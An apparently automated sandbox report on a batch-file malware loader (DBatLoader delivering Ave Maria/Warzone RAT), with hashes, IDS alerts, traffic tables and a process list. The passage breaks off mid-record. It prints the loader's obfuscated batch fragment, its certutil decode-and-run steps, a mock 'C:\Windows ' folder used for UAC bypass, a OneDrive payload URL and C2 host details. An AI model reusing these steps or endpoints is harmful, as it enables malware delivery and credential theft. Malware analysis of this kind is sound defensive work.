MD5:	82934f26cfc4b72a15289fe4055faca3
SHA1:	1a3d048f809a5dad4ee89670b94f42cf708b199a
SHA256:	277a01095a13bf08041d5a78c06f9f9ff32e77665e03cdd32c83ddc32a52fa59
SHA512:	4aeab25a0867a198cf62d1f9d611db6db91ee6c625fadcfba8516731356a6b79017eaa3c98da840a48076d05494ca389b20f4c7013f41f764c95854f2c11902f
SSDEEP:	24576:4pMnYCoTzMBGtRfB7M0iCIvTNzaNC5+PSCgcCPdQtJdaTrtFsAzDmThQNWmeC8qr:4p0YTTz5RRm6UCmWSiIuXhY4wV
TLSH:	F8C5E13389B948C593A551ED946DEECA0FF87997B014C6B68EC8B15A05F9C739E2C0CC
File Content Preview:	..&@cls&@set "_..=mj6tOHNkTGLUI5@pM19VBa7Co0iYvgf48qc2DJnKz3WZrXPuwFdhSxyRQbe lsEA"..%_..:~14,1%%.......%%_..:~61,1%%_..:~58,1%%_..:~3,1%%_..:~59,1%"_...=%_..:~21,1%%_..:~34,1%%_..:~12,1%%_..:~3,1%%_..:~13,1%%_..:~33,1%%_..:~30,1%%_..:~29,1%%_..:~19,1%%_.

File Icon


Icon Hash:	9686878b929a9886

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
91.92.254.111192.168.2.41977497322851945 02/06/24-08:49:47.932264	TCP	2851945	ETPRO TROJAN Ave Maria/Warzone RAT PingCommand	1977	49732	91.92.254.111	192.168.2.4
192.168.2.491.92.254.1114973219772851946 02/06/24-08:49:47.932715	TCP	2851946	ETPRO TROJAN Ave Maria/Warzone RAT PingResponse	49732	1977	192.168.2.4	91.92.254.111
192.168.2.491.92.254.1114973219772852357 02/06/24-08:48:08.135804	TCP	2852357	ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse	49732	1977	192.168.2.4	91.92.254.111
91.92.254.111192.168.2.41977497322851895 02/06/24-08:48:07.935224	TCP	2851895	ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound)	1977	49732	91.92.254.111	192.168.2.4
91.92.254.111192.168.2.41977497322852356 02/06/24-08:50:07.934374	TCP	2852356	ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket	1977	49732	91.92.254.111	192.168.2.4
91.92.254.111192.168.2.41977497322038897 02/06/24-08:48:07.935224	TCP	2038897	ET TROJAN Warzone RAT Response (Inbound)	1977	49732	91.92.254.111	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 6, 2024 08:48:01.491096973 CET	49729	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:01.491132975 CET	443	49729	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:01.491210938 CET	49729	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:01.491442919 CET	49729	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:01.491513968 CET	443	49729	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:01.491565943 CET	49729	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:01.522291899 CET	49730	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:01.522335052 CET	443	49730	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:01.522428989 CET	49730	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:01.526130915 CET	49730	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:01.526149035 CET	443	49730	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:01.909837961 CET	443	49730	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:01.909945011 CET	49730	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:01.913012981 CET	49730	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:01.913028955 CET	443	49730	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:01.913420916 CET	443	49730	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:01.954030037 CET	49730	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:01.993170023 CET	49730	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:02.037951946 CET	443	49730	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:02.673162937 CET	443	49730	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:02.673259974 CET	443	49730	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:02.673393965 CET	49730	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:02.675604105 CET	49730	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:02.675631046 CET	443	49730	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:07.507198095 CET	49732	1977	192.168.2.4	91.92.254.111
Feb 6, 2024 08:48:07.701272011 CET	1977	49732	91.92.254.111	192.168.2.4
Feb 6, 2024 08:48:07.701375961 CET	49732	1977	192.168.2.4	91.92.254.111
Feb 6, 2024 08:48:07.935224056 CET	1977	49732	91.92.254.111	192.168.2.4
Feb 6, 2024 08:48:07.978043079 CET	49732	1977	192.168.2.4	91.92.254.111
Feb 6, 2024 08:48:08.135803938 CET	49732	1977	192.168.2.4	91.92.254.111
Feb 6, 2024 08:48:08.370903015 CET	1977	49732	91.92.254.111	192.168.2.4
Feb 6, 2024 08:48:08.370999098 CET	49732	1977	192.168.2.4	91.92.254.111
Feb 6, 2024 08:48:08.619648933 CET	1977	49732	91.92.254.111	192.168.2.4
Feb 6, 2024 08:48:16.165833950 CET	49733	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:16.165937901 CET	443	49733	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:16.166011095 CET	49733	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:16.166237116 CET	49733	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:16.166292906 CET	443	49733	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:16.166351080 CET	49733	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:16.190612078 CET	49734	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:16.190668106 CET	443	49734	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:16.190759897 CET	49734	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:16.192981958 CET	49734	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:16.193016052 CET	443	49734	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:16.567925930 CET	443	49734	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:16.568080902 CET	49734	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:16.569340944 CET	49734	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:16.569367886 CET	443	49734	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:16.570452929 CET	443	49734	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:16.619415998 CET	49734	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:16.649281025 CET	49734	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:16.689937115 CET	443	49734	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:17.352108955 CET	443	49734	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:17.352207899 CET	443	49734	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:17.352271080 CET	49734	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:17.352382898 CET	49734	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:17.352422953 CET	443	49734	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:17.352448940 CET	49734	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:17.352464914 CET	443	49734	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:23.072004080 CET	49742	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:23.072103024 CET	443	49742	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:23.072201967 CET	49742	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:23.072480917 CET	49742	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:23.072578907 CET	443	49742	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:23.072638035 CET	49742	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:23.095361948 CET	49743	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:23.095403910 CET	443	49743	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:23.095483065 CET	49743	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:23.097476006 CET	49743	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:23.097493887 CET	443	49743	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:23.481981993 CET	443	49743	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:23.482074976 CET	49743	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:23.487066984 CET	49743	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:23.487077951 CET	443	49743	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:23.487410069 CET	443	49743	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:23.536642075 CET	49743	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:23.605175018 CET	49743	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:23.649935007 CET	443	49743	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:24.291201115 CET	443	49743	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:24.291292906 CET	443	49743	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:24.291367054 CET	49743	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:24.291605949 CET	49743	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:24.291619062 CET	443	49743	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:24.291646004 CET	49743	443	192.168.2.4	13.107.139.11
Feb 6, 2024 08:48:24.291651011 CET	443	49743	13.107.139.11	192.168.2.4
Feb 6, 2024 08:48:27.904234886 CET	1977	49732	91.92.254.111	192.168.2.4
Feb 6, 2024 08:48:27.904699087 CET	49732	1977	192.168.2.4	91.92.254.111
Feb 6, 2024 08:48:28.139434099 CET	1977	49732	91.92.254.111	192.168.2.4
Feb 6, 2024 08:48:47.914616108 CET	1977	49732	91.92.254.111	192.168.2.4
Feb 6, 2024 08:48:47.915173054 CET	49732	1977	192.168.2.4	91.92.254.111
Feb 6, 2024 08:48:48.151732922 CET	1977	49732	91.92.254.111	192.168.2.4
Feb 6, 2024 08:49:07.933870077 CET	1977	49732	91.92.254.111	192.168.2.4
Feb 6, 2024 08:49:07.934299946 CET	49732	1977	192.168.2.4	91.92.254.111
Feb 6, 2024 08:49:08.172502995 CET	1977	49732	91.92.254.111	192.168.2.4
Feb 6, 2024 08:49:27.932017088 CET	1977	49732	91.92.254.111	192.168.2.4
Feb 6, 2024 08:49:27.932531118 CET	49732	1977	192.168.2.4	91.92.254.111
Feb 6, 2024 08:49:28.167951107 CET	1977	49732	91.92.254.111	192.168.2.4
Feb 6, 2024 08:49:47.932264090 CET	1977	49732	91.92.254.111	192.168.2.4
Feb 6, 2024 08:49:47.932714939 CET	49732	1977	192.168.2.4	91.92.254.111
Feb 6, 2024 08:49:48.167792082 CET	1977	49732	91.92.254.111	192.168.2.4
Feb 6, 2024 08:50:07.934374094 CET	1977	49732	91.92.254.111	192.168.2.4
Feb 6, 2024 08:50:07.986823082 CET	49732	1977	192.168.2.4	91.92.254.111

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 6, 2024 08:48:01.363348007 CET	61136	53	192.168.2.4	1.1.1.1
Feb 6, 2024 08:48:02.679352045 CET	56718	53	192.168.2.4	1.1.1.1
Feb 6, 2024 08:48:07.335550070 CET	54605	53	192.168.2.4	1.1.1.1
Feb 6, 2024 08:48:07.492625952 CET	53	54605	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 6, 2024 08:48:01.363348007 CET	192.168.2.4	1.1.1.1	0x5514	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Feb 6, 2024 08:48:02.679352045 CET	192.168.2.4	1.1.1.1	0xa973	Standard query (0)	8rxyhq.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Feb 6, 2024 08:48:07.335550070 CET	192.168.2.4	1.1.1.1	0xc945	Standard query (0)	burger042.ddnsfree.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 6, 2024 08:48:01.480833054 CET	1.1.1.1	192.168.2.4	0x5514	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 6, 2024 08:48:01.480833054 CET	1.1.1.1	192.168.2.4	0x5514	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Feb 6, 2024 08:48:01.480833054 CET	1.1.1.1	192.168.2.4	0x5514	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Feb 6, 2024 08:48:01.480833054 CET	1.1.1.1	192.168.2.4	0x5514	No error (0)	dual-spov-0006.spov-msedge.net		13.107.139.11	A (IP address)	IN (0x0001)	false
Feb 6, 2024 08:48:01.480833054 CET	1.1.1.1	192.168.2.4	0x5514	No error (0)	dual-spov-0006.spov-msedge.net		13.107.137.11	A (IP address)	IN (0x0001)	false
Feb 6, 2024 08:48:02.853944063 CET	1.1.1.1	192.168.2.4	0xa973	No error (0)	8rxyhq.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 6, 2024 08:48:02.853944063 CET	1.1.1.1	192.168.2.4	0xa973	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Feb 6, 2024 08:48:07.492625952 CET	1.1.1.1	192.168.2.4	0xc945	No error (0)	burger042.ddnsfree.com		91.92.254.111	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

onedrive.live.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	13.107.139.11	443	2596	C:\Users\Public\pointer.com

Timestamp	Bytes transferred	Direction	Data
2024-02-06 07:48:01 UTC	213	OUT	GET /download?resid=BF523B4A9B64BC6C%21135&authkey=!AJFtRaE0WfJwO6E HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: onedrive.live.com
2024-02-06 07:48:02 UTC	1175	IN	HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: -1 Location: https://8rxyhq.am.files.1drv.com/y4mfBiglz8YyU9V3b3twgGQe0LQySDhgpDCtOzTrQ45ntYAryOp4shjIaZZfsmf7IW7sqil728fvJksWJMxj3y1AL409twlzH6QKSjvP5_xXVxsrz1ib7UxrLRja8z-OAKZ-cD4BpeZU3QGe0t_OHAid1TefjXP3qBCIod8LRE4RgoXvyJKDAw0_69uFYIKF8UY2NKs8zV9INO0b7-zS4zJVg/255_Kyvoykbdlmv?download&psid=1 Set-Cookie: E=P:viUU8ucm3Ig=:PVMOaOOs/TC2aAcXWF5GlpmhcrxAEwq8xtg0Hzj0ZYE=:F; domain=.live.com; path=/ Set-Cookie: xid=ffcc211f-d3d7-4b80-9658-335e241a53cd&&ODSP-ODWEB-ODCF&70; domain=.live.com; path=/ Set-Cookie: xidseq=1; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Tue, 06-Feb-2024 06:08:02 GMT; path=/ Set-Cookie: wla42=; domain=live.com; expires=Tue, 13-Feb-2024 07:48:02 GMT; path=/ X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-MSNServer: 6b6fcc7dd-sk9mg X-ODWebServer: nameastus2708987-odwebpl X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: 01A03CF8D80D4817B82F6526D47E2B3A Ref B: BN3EDGE0508 Ref C: 2024-02-06T07:48:02Z Date: Tue, 06 Feb 2024 07:48:02 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49734	13.107.139.11	443	7344	C:\Users\Public\Libraries\Kyvoykbd.PIF

Timestamp	Bytes transferred	Direction	Data
2024-02-06 07:48:16 UTC	213	OUT	GET /download?resid=BF523B4A9B64BC6C%21135&authkey=!AJFtRaE0WfJwO6E HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: onedrive.live.com
2024-02-06 07:48:17 UTC	1175	IN	HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: -1 Location: https://8rxyhq.am.files.1drv.com/y4m6qczzBL-6Qgtp1_yGbwbc99ja1thGmpqx8uKxVY_xbxl3fkf2m3OFPmzYatw08dZ4F0v-yugc67ZzForZd3SDfPwDdEVnxUhkiTw4EWd0TkSp0ouwsurxq7zA4iB0m9D9x978GFCpjIUg-ZtN-lP2RFa_bDDDZSa23zvpCqjsEDib5R4YagwqjJNrF10tCyjenGHnmLqZBPt7JC_7R6xLw/255_Kyvoykbdlmv?download&psid=1 Set-Cookie: E=P:+M/R+ucm3Ig=:lP7fHqsaV17EzAl4qt/dhJ+RiwFCKsAW1TeUEslfej4=:F; domain=.live.com; path=/ Set-Cookie: xid=ab98fec9-8bb4-43b2-80cb-bd1e157a4c33&&ODSP-ODWEB-ODCF&70; domain=.live.com; path=/ Set-Cookie: xidseq=1; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Tue, 06-Feb-2024 06:08:16 GMT; path=/ Set-Cookie: wla42=; domain=live.com; expires=Tue, 13-Feb-2024 07:48:17 GMT; path=/ X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-MSNServer: 6b6fcc7dd-lfc8f X-ODWebServer: nameastus2708987-odwebpl X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: C3E7DF2CB7A2427FA84E57283536A578 Ref B: BN3EDGE0517 Ref C: 2024-02-06T07:48:16Z Date: Tue, 06 Feb 2024 07:48:16 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49743	13.107.139.11	443	7592	C:\Users\Public\Libraries\Kyvoykbd.PIF

Timestamp	Bytes transferred	Direction	Data
2024-02-06 07:48:23 UTC	213	OUT	GET /download?resid=BF523B4A9B64BC6C%21135&authkey=!AJFtRaE0WfJwO6E HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: onedrive.live.com
2024-02-06 07:48:24 UTC	1176	IN	HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: -1 Location: https://8rxyhq.am.files.1drv.com/y4mUAP1ymrBd-yTUK-CEq_HTtBVr8tWG7SWIhrccYhDE7W1JTuqN9h-qN3t2eBC5jBZv4Tqkn9aFLGRtH_Af7dV7H2DUXM8SviguABguD55WRGmGFkcE9rpdyUytOYXuMyT_eK8amdOhYoFwOCfvXmCfRNjFA6zgSmN3JkJ152mrGGnFOBqof0xq24EuQxsNNaFzMA1CJnoi9ZZW7_nVhaknA/255_Kyvoykbdlmv?download&psid=1 Set-Cookie: E=P:Woz5/ucm3Ig=:d7DJqahfJKeZzILf0S0Nak2Dx4iQmbEt84+PpV5YVM4=:F; domain=.live.com; path=/ Set-Cookie: xid=22388f95-29d9-4847-92a1-b4ea2309426a&&ODSP-ODWEB-ODCF&70; domain=.live.com; path=/ Set-Cookie: xidseq=1; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Tue, 06-Feb-2024 06:08:23 GMT; path=/ Set-Cookie: wla42=; domain=live.com; expires=Tue, 13-Feb-2024 07:48:24 GMT; path=/ X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-MSNServer: 784d997699-525r7 X-ODWebServer: nameastus2946819-odwebpl X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: EC8B29EC4E89466692B0A7500BF618D4 Ref B: BN3EDGE0220 Ref C: 2024-02-06T07:48:23Z Date: Tue, 06 Feb 2024 07:48:23 GMT Connection: close Content-Length: 0

Target ID:	0
Start time:	08:47:56
Start date:	06/02/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PRODUCT.bat" "
Imagebase:	0x7ff7d8500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:47:56
Start date:	06/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:47:57
Start date:	06/02/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c del "C:\Users\Public\pointer.com" / A / F / Q / S
Imagebase:	0x7ff7d8500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:47:57
Start date:	06/02/2024
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	certutil -decodehex "C:\Users\user\Desktop\PRODUCT.bat" "C:\Users\Public\pointer.com" 3
Imagebase:	0x7ff781830000
File size:	1'651'712 bytes
MD5 hash:	F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000003.00000003.1637088713.000002599966D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:47:57
Start date:	06/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:47:57
Start date:	06/02/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c PING -n 2 127.0.0.1
Imagebase:	0x7ff7d8500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:47:57
Start date:	06/02/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	PING -n 2 127.0.0.1
Imagebase:	0x7ff762b10000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:47:58
Start date:	06/02/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c start C:\Users\Public\pointer.com
Imagebase:	0x7ff7d8500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:47:58
Start date:	06/02/2024
Path:	C:\Users\Public\pointer.com
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\pointer.com
Imagebase:	0x400000
File size:	1'951'744 bytes
MD5 hash:	9D00A95BE6B82AB307043A988595487B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000000.1646752088.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000003.1691476533.000000007EB40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000008.00000002.1723986250.00000000123C8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1723986250.00000000123C8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000008.00000002.1723986250.00000000123C8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000008.00000002.1723986250.00000000123C8000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1696692635.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000008.00000003.1696692635.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000008.00000003.1696692635.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000008.00000002.1725155820.0000000012645000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1725155820.0000000012645000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000008.00000002.1725155820.0000000012645000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000008.00000002.1725155820.0000000012645000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000008.00000003.1696692635.000000007EEF4000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\Public\pointer.com, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:47:58
Start date:	06/02/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c exit /b 0
Imagebase:	0x7ff7d8500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:48:03
Start date:	06/02/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\KyvoykbdO.bat" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:48:03
Start date:	06/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:48:03
Start date:	06/02/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c mkdir "\\?\C:\Windows "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:48:03
Start date:	06/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
